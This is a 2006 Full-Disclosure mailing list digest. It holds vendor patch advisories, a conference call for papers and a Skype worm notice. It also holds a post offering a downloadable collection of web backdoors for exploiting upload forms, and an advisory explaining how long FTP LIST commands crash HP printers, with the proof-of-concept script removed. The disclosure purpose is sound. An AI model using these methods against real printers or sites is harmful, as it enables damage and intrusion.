http://sourceforge.net/projects/sinfp/

Anyway, I'm sorry to not have mentionned it earlier.

-- 
  ^  ___  ___             http://www.GomoR.org/          <-+
  | / __ |__/          Systems & Security Engineer         |
  | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---    |
  +-->  Net::Frame <=> http://search.cpan.org/~gomor/  <---+



From sebastian.wolfgarten at gmx.net  Mon Dec 18 23:11:33 2006
From: sebastian.wolfgarten at gmx.net (Sebastian Wolfgarten)
Date: Tue, 19 Dec 2006 00:11:33 +0100
Subject: [Full-disclosure] Security contact at McAfee
Message-ID: <200612190011.33147.sebastian.wolfgarten@gmx.net>

Hi,

apologies for this rather dumb question: Does anyknow know a security contact 
at McAfee? I was unable to find one on their website...is it as simple as 
security at mcafee.com?

Thanks.

Best regards,
Sebastian Wolfgarten



From sebastian.wolfgarten at gmx.net  Mon Dec 18 23:46:44 2006
From: sebastian.wolfgarten at gmx.net (Sebastian Wolfgarten)
Date: Tue, 19 Dec 2006 00:46:44 +0100
Subject: [Full-disclosure] Security contact at McAfee (follow-up)
Message-ID: <200612190046.44876.sebastian.wolfgarten@gmx.net>

Hi,

thanks for all the private responses I received so far. For the FD archives: 
The security contacts at McAfee are available at  
and  respectively.

Sorry for the noise and good night!

Best regards,
Sebastian



From xyberpix at xyberpix.com  Mon Dec 18 23:41:56 2006
From: xyberpix at xyberpix.com (xyberpix)
Date: Mon, 18 Dec 2006 23:41:56 +0000
Subject: [Full-disclosure] Security contact at McAfee
In-Reply-To: <200612190011.33147.sebastian.wolfgarten@gmx.net>
References: <200612190011.33147.sebastian.wolfgarten@gmx.net>
Message-ID: <81A6EB19-358A-474A-A994-C090EC25612B@xyberpix.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi Sebastian,

Try these:


Tracy Ross - McAfee Enterprise Security:
     Phone: 408-346-5965
     Email: tracy_ross at mcafee.com

Erica Coleman - McAfee Enterprise Security:
     Phone: 408-346-5624
     Email: erica_coleman at mcafee.com

xyberpix

On 18 Dec 2006, at 23:11, Sebastian Wolfgarten wrote:

> Hi,
>
> apologies for this rather dumb question: Does anyknow know a  
> security contact
> at McAfee? I was unable to find one on their website...is it as  
> simple as
> security at mcafee.com?
>
> Thanks.
>
> Best regards,
> Sebastian Wolfgarten
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFFhydEt+Si58vRtJARApaQAJ0ahX+0oUksFQ6hLDtUBkGYKBl8GwCfbyZi
Ss0ZwgE7QUMWVZCL+3YR1l8=
=EZiu
-----END PGP SIGNATURE-----



From david.kierznowski at gmail.com  Mon Dec 18 17:28:55 2006
From: david.kierznowski at gmail.com (David Kierznowski)
Date: Mon, 18 Dec 2006 17:28:55 +0000
Subject: [Full-disclosure] Web Backdoor Compilation
Message-ID: 

I have collected some WEB backdoors in the past to exploit vulnerable
file upload facilities etc. and have packaged them up. I think a
library like this may be useful in a variety of situations.

Interested parties can find version 1 of the package here:
http://michaeldaw.org/projects/web-backdoor-compilation/



From security at mandriva.com  Tue Dec 19 02:19:00 2006
From: security at mandriva.com (security at mandriva.com)
Date: Mon, 18 Dec 2006 19:19:00 -0700
Subject: [Full-disclosure] [ MDKSA-2006:232 ] - Updated proftpd packages fix
	mod_ctrls vulnerability
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:232
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : proftpd
 Date    : December 18, 2006
 Affected: 2007.0
 _______________________________________________________________________
 
 Problem Description:
 
 Stack-based buffer overflow in the pr_ctrls_recv_request function in
 ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local
 users to execute arbitrary code via a large reqarglen length value.

 Packages have been patched to correct these issues.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6563
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 afa8803b9eede3fb73f55d31cb33e594  2007.0/i586/proftpd-1.3.0-4.4mdv2007.0.i586.rpm
 a1239dcf4957c20d234084c22a063812  2007.0/i586/proftpd-anonymous-1.3.0-4.4mdv2007.0.i586.rpm
 e9e9a955957310f3ef26fa55e24a191d  2007.0/i586/proftpd-mod_autohost-1.3.0-4.4mdv2007.0.i586.rpm
 f1b9111ed66ef2316e386e992bff56a8  2007.0/i586/proftpd-mod_case-1.3.0-4.4mdv2007.0.i586.rpm
 2f2aa9286bc126898cb23eaac5547cc0  2007.0/i586/proftpd-mod_clamav-1.3.0-4.4mdv2007.0.i586.rpm
 c5c71f0f78f6506842756ba9c79d121e  2007.0/i586/proftpd-mod_ctrls_admin-1.3.0-4.4mdv2007.0.i586.rpm
 bafbeb5bfc0684fcd053caec876646e8  2007.0/i586/proftpd-mod_facl-1.3.0-4.4mdv2007.0.i586.rpm
 4f4c8bd3a36ff3b68e7a479590a3ee25  2007.0/i586/proftpd-mod_gss-1.3.0-4.4mdv2007.0.i586.rpm
 d5c741aec06c740e9d7f035a887f68d5  2007.0/i586/proftpd-mod_ifsession-1.3.0-4.4mdv2007.0.i586.rpm
 e61958daf818219eb409565efb0be974  2007.0/i586/proftpd-mod_ldap-1.3.0-4.4mdv2007.0.i586.rpm
 c6f84f04b1a35ef26d6985a9063f0993  2007.0/i586/proftpd-mod_load-1.3.0-4.4mdv2007.0.i586.rpm
 dc0fec8773907dd7739fab6f5f6a5c78  2007.0/i586/proftpd-mod_quotatab-1.3.0-4.4mdv2007.0.i586.rpm
 860e998696b9140c94357457136be823  2007.0/i586/proftpd-mod_quotatab_file-1.3.0-4.4mdv2007.0.i586.rpm
 31478a97cf53f3da2b02ff26a19f9f69  2007.0/i586/proftpd-mod_quotatab_ldap-1.3.0-4.4mdv2007.0.i586.rpm
 355b61338fd647be4054d19e6c01587c  2007.0/i586/proftpd-mod_quotatab_sql-1.3.0-4.4mdv2007.0.i586.rpm
 aef74c8839a8cb1fef322573a5c8d484  2007.0/i586/proftpd-mod_radius-1.3.0-4.4mdv2007.0.i586.rpm
 39b8c05989e14fc1aeb6fd1395d43973  2007.0/i586/proftpd-mod_ratio-1.3.0-4.4mdv2007.0.i586.rpm
 61317e3f7742f4de4cfb26780f5cdd9a  2007.0/i586/proftpd-mod_rewrite-1.3.0-4.4mdv2007.0.i586.rpm
 4eba5eb110289f346d1ba0881ac82d50  2007.0/i586/proftpd-mod_shaper-1.3.0-4.4mdv2007.0.i586.rpm
 481a8ed2e0ffbc03751d26cd2ae0acb3  2007.0/i586/proftpd-mod_site_misc-1.3.0-4.4mdv2007.0.i586.rpm
 76e926b07afbe8748f0ca072a1456c9b  2007.0/i586/proftpd-mod_sql-1.3.0-4.4mdv2007.0.i586.rpm
 834b63d40bb375af7694165303dbaf54  2007.0/i586/proftpd-mod_sql_mysql-1.3.0-4.4mdv2007.0.i586.rpm
 68190d61d5f9dc321d5e96eebdc6bc17  2007.0/i586/proftpd-mod_sql_postgres-1.3.0-4.4mdv2007.0.i586.rpm
 d2a242a9d88ac200a5715ec3a979627d  2007.0/i586/proftpd-mod_time-1.3.0-4.4mdv2007.0.i586.rpm
 a5d110ed77605d7056795a759d620774  2007.0/i586/proftpd-mod_tls-1.3.0-4.4mdv2007.0.i586.rpm
 6d563b023289499bafa6438e18bea304  2007.0/i586/proftpd-mod_wrap-1.3.0-4.4mdv2007.0.i586.rpm
 97066280186fe51879b1f9f83a0fe865  2007.0/i586/proftpd-mod_wrap_file-1.3.0-4.4mdv2007.0.i586.rpm
 2a8ffd5324411ca4c5579b0f3cc821e0  2007.0/i586/proftpd-mod_wrap_sql-1.3.0-4.4mdv2007.0.i586.rpm 
 9ebf57be4074ca06a03e73ea67157225  2007.0/SRPMS/proftpd-1.3.0-4.4mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 952398679665b5a5647ef5f879797074  2007.0/x86_64/proftpd-1.3.0-4.4mdv2007.0.x86_64.rpm
 b67b546a78493bc67296b001da9f6dc5  2007.0/x86_64/proftpd-anonymous-1.3.0-4.4mdv2007.0.x86_64.rpm
 57d7228f8190ad5956221ddd33748b2d  2007.0/x86_64/proftpd-mod_autohost-1.3.0-4.4mdv2007.0.x86_64.rpm
 c81674d9864512a2b47b00a4b9fc7ea2  2007.0/x86_64/proftpd-mod_case-1.3.0-4.4mdv2007.0.x86_64.rpm
 38629437de2866467dbee64942ef3d55  2007.0/x86_64/proftpd-mod_clamav-1.3.0-4.4mdv2007.0.x86_64.rpm
 59b89afa67aa44cf302b4585738d6b0c  2007.0/x86_64/proftpd-mod_ctrls_admin-1.3.0-4.4mdv2007.0.x86_64.rpm
 11d2e9e34803433fb623bff58e19fcc3  2007.0/x86_64/proftpd-mod_facl-1.3.0-4.4mdv2007.0.x86_64.rpm
 904dc5ff6e1ca7205eb28a0d31db67df  2007.0/x86_64/proftpd-mod_gss-1.3.0-4.4mdv2007.0.x86_64.rpm
 c3eed275e17b61dc989e898531c3f2ed  2007.0/x86_64/proftpd-mod_ifsession-1.3.0-4.4mdv2007.0.x86_64.rpm
 a060e67e5b0fe1e15dbc2e6d148de9b2  2007.0/x86_64/proftpd-mod_ldap-1.3.0-4.4mdv2007.0.x86_64.rpm
 959febcf9f74abccf5e3f249b3cd4501  2007.0/x86_64/proftpd-mod_load-1.3.0-4.4mdv2007.0.x86_64.rpm
 f0807b9080f431540bfe8b5729b2005f  2007.0/x86_64/proftpd-mod_quotatab-1.3.0-4.4mdv2007.0.x86_64.rpm
 b0c463356a8cbc6140d6ea7b28c6dc72  2007.0/x86_64/proftpd-mod_quotatab_file-1.3.0-4.4mdv2007.0.x86_64.rpm
 7dc4d54215124488579a572f49e4eea8  2007.0/x86_64/proftpd-mod_quotatab_ldap-1.3.0-4.4mdv2007.0.x86_64.rpm
 2e8fbfc88d28b2fd367088ffb66b044e  2007.0/x86_64/proftpd-mod_quotatab_sql-1.3.0-4.4mdv2007.0.x86_64.rpm
 6569fcc36cc6d11dfcc50db89a33037f  2007.0/x86_64/proftpd-mod_radius-1.3.0-4.4mdv2007.0.x86_64.rpm
 39838f915a30da0f1ed0245fc521051e  2007.0/x86_64/proftpd-mod_ratio-1.3.0-4.4mdv2007.0.x86_64.rpm
 dd89c2a4e5878c440fa506b36104f0fb  2007.0/x86_64/proftpd-mod_rewrite-1.3.0-4.4mdv2007.0.x86_64.rpm
 4b581f3bc61e0d34ff91f4dfad973ea1  2007.0/x86_64/proftpd-mod_shaper-1.3.0-4.4mdv2007.0.x86_64.rpm
 37c2b30dcfc23cd9d1b6483e3b436442  2007.0/x86_64/proftpd-mod_site_misc-1.3.0-4.4mdv2007.0.x86_64.rpm
 a6ea95e4cdc9c3a17d06442c41169d69  2007.0/x86_64/proftpd-mod_sql-1.3.0-4.4mdv2007.0.x86_64.rpm
 a7011c17a1a97a32b46a0a125fcaa28e  2007.0/x86_64/proftpd-mod_sql_mysql-1.3.0-4.4mdv2007.0.x86_64.rpm
 f65a272ba0af2f52a26fba6ebd216ee0  2007.0/x86_64/proftpd-mod_sql_postgres-1.3.0-4.4mdv2007.0.x86_64.rpm
 3187bcd5a199bbdafa6b49a43eb6cf91  2007.0/x86_64/proftpd-mod_time-1.3.0-4.4mdv2007.0.x86_64.rpm
 296952dc6fd46b23a309e762d7784044  2007.0/x86_64/proftpd-mod_tls-1.3.0-4.4mdv2007.0.x86_64.rpm
 dad6e49ca6ea17a06d22740532acfc33  2007.0/x86_64/proftpd-mod_wrap-1.3.0-4.4mdv2007.0.x86_64.rpm
 c3fa12831336500d533262efe59541a7  2007.0/x86_64/proftpd-mod_wrap_file-1.3.0-4.4mdv2007.0.x86_64.rpm
 3359395a670ecb3d7a94fc9e5d75373a  2007.0/x86_64/proftpd-mod_wrap_sql-1.3.0-4.4mdv2007.0.x86_64.rpm 
 9ebf57be4074ca06a03e73ea67157225  2007.0/SRPMS/proftpd-1.3.0-4.4mdv2007.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFhyHEmqjQ0CJFipgRAszVAKDv2+bcq/wUxBU+DoUAIULG2/3GnACfctm9
T7DEwmtzr0kb7QLa9xkBPH0=
=ZF2C
-----END PGP SIGNATURE-----



From security at mandriva.com  Tue Dec 19 02:54:00 2006
From: security at mandriva.com (security at mandriva.com)
Date: Mon, 18 Dec 2006 19:54:00 -0700
Subject: [Full-disclosure] [ MDKSA-2006:233 ] - Updated dbus packages fix
	vulnerability
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:233
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : dbus
 Date    : December 18, 2006
 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________
 
 Problem Description:
 
 A vulnerability was discovered in D-Bus that could be exploited by a
 local attacker to cause a Denial of Service.

 Updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6107
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 157420971aee9447fe45a6989c977b6f  2006.0/i586/dbus-0.23.4-5.2.20060mdk.i586.rpm
 8880db0565d247075ca954caa5ef1fab  2006.0/i586/dbus-python-0.23.4-5.2.20060mdk.i586.rpm
 b2349a9c93daee901c2a4122a928460b  2006.0/i586/dbus-x11-0.23.4-5.2.20060mdk.i586.rpm
 37ab661a3f6e6786349562efacb37668  2006.0/i586/libdbus-1_0-0.23.4-5.2.20060mdk.i586.rpm
 665252fd7ec462c7e1a771f2fc649d5b  2006.0/i586/libdbus-1_0-devel-0.23.4-5.2.20060mdk.i586.rpm
 f5e7a8a261a90c0abd7cba5323d365b6  2006.0/i586/libdbus-glib-1_0-0.23.4-5.2.20060mdk.i586.rpm
 4d9b722ad5f26be663108b011645d2dd  2006.0/i586/libdbus-qt-1_0-0.23.4-5.2.20060mdk.i586.rpm
 0cc5027f1378ba34ee4c812536dc3eaa  2006.0/i586/libdbus-qt-1_0-devel-0.23.4-5.2.20060mdk.i586.rpm 
 3ae5fcaa025ca99a30876dd757f91c17  2006.0/SRPMS/dbus-0.23.4-5.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 ebd67615affd1f1cb636b22a9c7d595f  2006.0/x86_64/dbus-0.23.4-5.2.20060mdk.x86_64.rpm
 89b3b13503f01dad8876e16064c216d0  2006.0/x86_64/dbus-python-0.23.4-5.2.20060mdk.x86_64.rpm
 9652189a6b3459458313544b7da84f02  2006.0/x86_64/dbus-x11-0.23.4-5.2.20060mdk.x86_64.rpm
 c2fcfd767785038f74d25e0532f77ef5  2006.0/x86_64/lib64dbus-1_0-0.23.4-5.2.20060mdk.x86_64.rpm
 38254d5bef798ae2e5aa13f942a7fd3c  2006.0/x86_64/lib64dbus-1_0-devel-0.23.4-5.2.20060mdk.x86_64.rpm
 f575dd010c4e3c2e64576f941d9f5723  2006.0/x86_64/lib64dbus-glib-1_0-0.23.4-5.2.20060mdk.x86_64.rpm
 d0c3cb484539042a6035eb548931bf7e  2006.0/x86_64/lib64dbus-qt-1_0-0.23.4-5.2.20060mdk.x86_64.rpm
 53250a34e675c61994ed0740e95a4171  2006.0/x86_64/lib64dbus-qt-1_0-devel-0.23.4-5.2.20060mdk.x86_64.rpm 
 3ae5fcaa025ca99a30876dd757f91c17  2006.0/SRPMS/dbus-0.23.4-5.2.20060mdk.src.rpm

 Mandriva Linux 2007.0:
 068faa33b6cb80a6e9cb434ff45f9c3c  2007.0/i586/dbus-0.92-8.2mdv2007.0.i586.rpm
 5b7890f6585084f62c30a805ae413542  2007.0/i586/dbus-x11-0.92-8.2mdv2007.0.i586.rpm
 0b4b857d9b8214d4c8862d34c29f1bb6  2007.0/i586/libdbus-1_3-0.92-8.2mdv2007.0.i586.rpm
 6b24df1469fc9e02f8958fe070dea431  2007.0/i586/libdbus-1_3-devel-0.92-8.2mdv2007.0.i586.rpm 
 413a21795748c8897eb74dece25e8187  2007.0/SRPMS/dbus-0.92-8.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 2b13e29b75d3b353ac7f773d29d99e00  2007.0/x86_64/dbus-0.92-8.2mdv2007.0.x86_64.rpm
 2d755ac55933d96ae2098887120aa9b3  2007.0/x86_64/dbus-x11-0.92-8.2mdv2007.0.x86_64.rpm
 154086ed8af376e8ed6e5a794a4ff20f  2007.0/x86_64/lib64dbus-1_3-0.92-8.2mdv2007.0.x86_64.rpm
 3a1d2f9656d0f23469267c1105c9c52f  2007.0/x86_64/lib64dbus-1_3-devel-0.92-8.2mdv2007.0.x86_64.rpm 
 413a21795748c8897eb74dece25e8187  2007.0/SRPMS/dbus-0.92-8.2mdv2007.0.src.rpm

 Corporate 3.0:
 0da4e1ae5ccdfa2578a4648d097d7fe5  corporate/3.0/i586/dbus-0.20-7.2.C30mdk.i586.rpm
 d30d24f78af2516c80b83c38137e7ba7  corporate/3.0/i586/dbus-python-0.20-7.2.C30mdk.i586.rpm
 a75d84cd539b35ebcc3b71538e028884  corporate/3.0/i586/dbus-x11-0.20-7.2.C30mdk.i586.rpm
 8346ecc52caf074c8501ea7515991acc  corporate/3.0/i586/libdbus-1_0-0.20-7.2.C30mdk.i586.rpm
 52e7ebc3a55744296b8035ffa2f73098  corporate/3.0/i586/libdbus-1_0-devel-0.20-7.2.C30mdk.i586.rpm
 854973491bef16467a39563ee27b1e83  corporate/3.0/i586/libdbus-glib-1_0-0.20-7.2.C30mdk.i586.rpm
 9a95af41bd674b3421bbd8587515b9e1  corporate/3.0/i586/libdbus-qt-1_0-0.20-7.2.C30mdk.i586.rpm 
 2f2de379e492bb5e3a59706d9fa0ca01  corporate/3.0/SRPMS/dbus-0.20-7.2.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 9f17293ce755710c2a8f17a51a5cadae  corporate/3.0/x86_64/dbus-0.20-7.2.C30mdk.x86_64.rpm
 8ecb34ef80a01d62819ca0366b55da82  corporate/3.0/x86_64/dbus-python-0.20-7.2.C30mdk.x86_64.rpm
 8f3a5758db4b1bff842a54fa287f53c3  corporate/3.0/x86_64/dbus-x11-0.20-7.2.C30mdk.x86_64.rpm
 5b46732a66d140e679efa345c5931efc  corporate/3.0/x86_64/lib64dbus-1_0-0.20-7.2.C30mdk.x86_64.rpm
 5ae46e081ca781086cec632e52f456e0  corporate/3.0/x86_64/lib64dbus-1_0-devel-0.20-7.2.C30mdk.x86_64.rpm
 c90ba4ffadc8e9698e13f1f732848f1f  corporate/3.0/x86_64/lib64dbus-glib-1_0-0.20-7.2.C30mdk.x86_64.rpm
 fce35cfd33d35fa2adfd9430fce967ff  corporate/3.0/x86_64/lib64dbus-qt-1_0-0.20-7.2.C30mdk.x86_64.rpm 
 2f2de379e492bb5e3a59706d9fa0ca01  corporate/3.0/SRPMS/dbus-0.20-7.2.C30mdk.src.rpm

 Corporate 4.0:
 c17bf8152d2f720687102826d1c7d91a  corporate/4.0/i586/dbus-0.23.4-5.2.20060mlcs4.i586.rpm
 105cd3f06c1db4326b13e617b23dbd98  corporate/4.0/i586/dbus-python-0.23.4-5.2.20060mlcs4.i586.rpm
 6abe23d4761f2055dfeec827fb73e37b  corporate/4.0/i586/dbus-x11-0.23.4-5.2.20060mlcs4.i586.rpm
 3c32ecf3c016ddc1250b76053943b5cf  corporate/4.0/i586/libdbus-1_0-0.23.4-5.2.20060mlcs4.i586.rpm
 3b8b8acef4788298e39fb8850f9dae84  corporate/4.0/i586/libdbus-1_0-devel-0.23.4-5.2.20060mlcs4.i586.rpm
 1a9bb5ec1ea6c6cc1fd53e0089582e6b  corporate/4.0/i586/libdbus-glib-1_0-0.23.4-5.2.20060mlcs4.i586.rpm
 d0627fc8df86636f77d00f460be39159  corporate/4.0/i586/libdbus-qt-1_0-0.23.4-5.2.20060mlcs4.i586.rpm
 d7bff85929ee4ec46af4aa3a3d95d9e5  corporate/4.0/i586/libdbus-qt-1_0-devel-0.23.4-5.2.20060mlcs4.i586.rpm 
 d48bfee5da58ced50182d93e57f51040  corporate/4.0/SRPMS/dbus-0.23.4-5.2.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 394ac36df35781c105b2706b8db9906c  corporate/4.0/x86_64/dbus-0.23.4-5.2.20060mlcs4.x86_64.rpm
 fff86f6a37644bbec029dc91e9d12cfe  corporate/4.0/x86_64/dbus-python-0.23.4-5.2.20060mlcs4.x86_64.rpm
 e00c9c7f22f11e6b04608fb717f36f6d  corporate/4.0/x86_64/dbus-x11-0.23.4-5.2.20060mlcs4.x86_64.rpm
 df3c1c3cdd6f0b08888900e58699a04d  corporate/4.0/x86_64/lib64dbus-1_0-0.23.4-5.2.20060mlcs4.x86_64.rpm
 37b4efbc19b4272faa12cc184f8f1e3b  corporate/4.0/x86_64/lib64dbus-1_0-devel-0.23.4-5.2.20060mlcs4.x86_64.rpm
 7007d7ba7c172d4d64ae510abedc573b  corporate/4.0/x86_64/lib64dbus-glib-1_0-0.23.4-5.2.20060mlcs4.x86_64.rpm
 c0498bc99d42e57158d69262c760f42c  corporate/4.0/x86_64/lib64dbus-qt-1_0-0.23.4-5.2.20060mlcs4.x86_64.rpm
 a47ff9a620d21558b7c2a110834651d0  corporate/4.0/x86_64/lib64dbus-qt-1_0-devel-0.23.4-5.2.20060mlcs4.x86_64.rpm 
 d48bfee5da58ced50182d93e57f51040  corporate/4.0/SRPMS/dbus-0.23.4-5.2.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFhybDmqjQ0CJFipgRAmoxAJ9BagLKU7/gik+V+C31inRelU+oBQCfTwOt
SFCPPn6dsW8NRZiYXxmBrSY=
=Scv+
-----END PGP SIGNATURE-----



From prabu at hackinthebox.org  Tue Dec 19 03:06:30 2006
From: prabu at hackinthebox.org (Praburaajan)
Date: Tue, 19 Dec 2006 11:06:30 +0800
Subject: [Full-disclosure] HITBSecConf2007 - Dubai - Call for Papers now
	open!
Message-ID: <45875736.1090507@hackinthebox.org>

The call for papers for the upcoming Hack in The Box Security Conference 
2007 - Dubai is now open.

HITBSecConf2007 - Dubai will take place at The Sheraton Creek hotel and 
will run from the 2nd till the 5th of April 2007. Keynote speakers for 
the conference will be Mikko Hypponen (Chief Research Officer, F-Secure 
Corporation) and Lance Spitzner (Founder, Honeynet Project). Security 
researchers based in an around the Middle East are encouraged to apply.

SUBMISSION

HITBSecConf is a deep-knowledge technical conference. Talks that are 
more technical or that discuss new and never before seen attack methods 
are of more interest than a subject that has been covered several times 
before. Summaries not exceeding 250 words should be submitted (in plain 
text format) to cfp -at- hackinthebox.org for review and possible 
inclusion in the programme.

Submissions are due no later than 1st of February 2007

TOPICS

Topics of interest include, but are not limited to the following:

# Analysis of network and security vulnerabilities
# Firewall technologies
# Intrusion detection
# Data Recovery and Incident Response
# GPRS and CDMA Security
# Identification and Entity Authentication
# Network Protocol and Analysis
# Smart Card Security
# Virus and Worms
# WLAN and Bluetooth Security.
# Analysis of malicious code
# Applications of cryptographic techniques,
# Analysis of attacks against networks and machines
# Denial-of-service attacks and countermeasures
# File system security
# Security in heterogeneous and large-scale environments
# Techniques for developing secure systems

PLEASE NOTE:

We do not accept product or vendor related pitches. If your talk 
involves an advertisement for a new product or service your company is 
offering, please do not submit.

Your submission should include:

# Name, title, address, email and phone/contact number
# Draft of the proposed presentation (in PDF or PowerPoint format), 
proof of concept for tools and exploits, etc.
# Short biography, qualification, occupation, achievement and 
affiliations (limit 150 words).
# Summary or abstract for your presentation (limit 250 words)
# Time (45-60 minutes including time for discussion and questions)
# Technical requirements (video, internet, wireless, audio, etc.)

Each non-resident speaker will receive accommodation for 3 nights at The 
Sheraton Creek hotel in Dubai. For each non-resident speaker, HITB will 
cover travel expenses (through our airline partners, Emirates Airlines 
and Malaysia Airlines) up to USD 1,000.00.

For further details please take a look at the CFP page:
http://conference.hitb.org/hitbsecconf2007dubai/?page_id=72

Warm regards,

The HITB Team
HITBSecConf2007 - Dubai
http://conference.hitb.org/hitbsecconf2007dubai/



From yosuke.hasegawa at gmail.com  Tue Dec 19 02:41:58 2006
From: yosuke.hasegawa at gmail.com (HASEGAWA Yosuke )
Date: Tue, 19 Dec 2006 11:41:58 +0900
Subject: [Full-disclosure] Backdooring Image Files - security notice
In-Reply-To: <6905b1570612142114m5b078aa4wecb025d6e4c14ba1@mail.gmail.com>
References: <6905b1570612142114m5b078aa4wecb025d6e4c14ba1@mail.gmail.com>
Message-ID: <5559abfc0612181841n16f74f21x839571517189a26b@mail.gmail.com>

Hi.

On 12/15/06, pdp (architect)  wrote:
> I will be brief. There is a rather lame/concerning technique, most of
> you know about, that allows JavaScript to be executed upon visiting an
> image file. This issue is not due to some browser error, although
> clearly IE has some issues with it, but it is due to web applications
> not sanitizing user supplied content in a form of links.

On Windows server, FindMimeFromData function can be used IE to
know what kind of file type it is determine with on the server side.
http://msdn.microsoft.com/workshop/networking/moniker/reference/functions/findmimefromdata.asp

Of course, a result may become  mismatch by the browser and
server side.

Or, adding "Content-Disposition: attachment" for response header,
It can be used to prevent executing script on browser directly.

-- 
HASEGAWA Yosuke
    yosuke.hasegawa at gmail.com



From juha-matti.laurio at netti.fi  Tue Dec 19 14:25:34 2006
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Tue, 19 Dec 2006 16:25:34 +0200 (EET)
Subject: [Full-disclosure] Skype worm in the wild
Message-ID: <26548218.214831166538334991.JavaMail.juha-matti.laurio@netti.fi>

New worm spreading with a malicious Skype Chat link and Skype application has been reported.

The dangerous link starts with "Check this!" pointing to .org address.
There is no information about unpatched issues in Skype, the worm just uses Skype to spread.

More details at
http://www.websense.com/securitylabs/blog/blog.php?BlogID=101
and
http://blogs.securiteam.com/?p=766

- Juha-Matti



From joxeankoret at yahoo.es  Tue Dec 19 17:54:56 2006
From: joxeankoret at yahoo.es (Joxean Koret)
Date: Tue, 19 Dec 2006 18:54:56 +0100
Subject: [Full-disclosure] HP Printers FTP Server Denial Of Service
Message-ID: <1166550897.3840.24.camel@localhost.localdomain>

HP FTP Printer Server Denial Of Service
---------------------------------------

Author: Joxean Koret
Date: 2006
Location: Basque Country 

Affected Software
-----------------

Vendor: Hewlett Packard
Description: HP Printers FTP Server Denial Of Service

Description
-----------

A problem exists in almost any currently used HP Printer with the FTP
Print Server.

Version 2.4 of the FTP Print Server will crash with only one shoot.
Version 2.4.5, which is latest, will need various shoots (the number of
shoots needed is currently unknow).

While playing with my own FTP Fuzzer I tried finding flaws in HP's
Printers. After trying with 5 printers I found the problem in all of
these. The problem is a buffer overflow in the LIST and NLST command. In
version 2.4 a single shoot sending a LIST command with a long string
(about 256 characters) is sufficient enough to test the vulnerability.

Take care trying it because two of my printers were crashed completely
(you will need to make use of your warranty ;] ). Against 2.4 versions
it can crash the complete printer and be unresponsive even after
rebooting it.

In version 2.4.5 (which is the latest) you need to send various times
long shoots to the parameter LIST (a single shoot will not crash,
printer will answer with a "Path too long" message). You will need to
send various times a LIST command with long strings. When trying with
other commands you will see that no problem is raised and the printer
will always be responsive. After a successfull attack you may completely
crash your printer (i.e., calling technical support to fix your crashed
printer).

The problem can be easily triggered by using any FTP fuzzing tool. You
can crash your printer in about 10 second(s) in a LAN.

The printer models I used in my tests are:

  * HP LaserJet 5000 Series (firmware R.25.15 / R.25.47)
  * HP LaserJet 5100 Series (firmware V.29.12)

Attached goes POCs for the vulnerabilities.

Workaround
----------

Disable the FTP print server as, surely, you aren't using it.


Disclaimer
----------

The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

Contact
-------

Joxean Koret < joxeankoret [at] yah00 [D0T] es >

-- 
-----------------------------------
Agian, agian, eg?n batez
jeikiko dira egiazko Ziberotarrak,
egiazko e?skald?nak,
tirano arrotzen hiltzeko 
eta gure aiten aitek ?tzi daikien 
lurraren pop?liari erremetitzeko.
-----------------------------------
-------------- next part --------------
A non-text attachment was scrubbed...
Name: dos2.4.5.py
Type: text/x-python
Size: 1260 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061219/a8df619e/attachment.py 
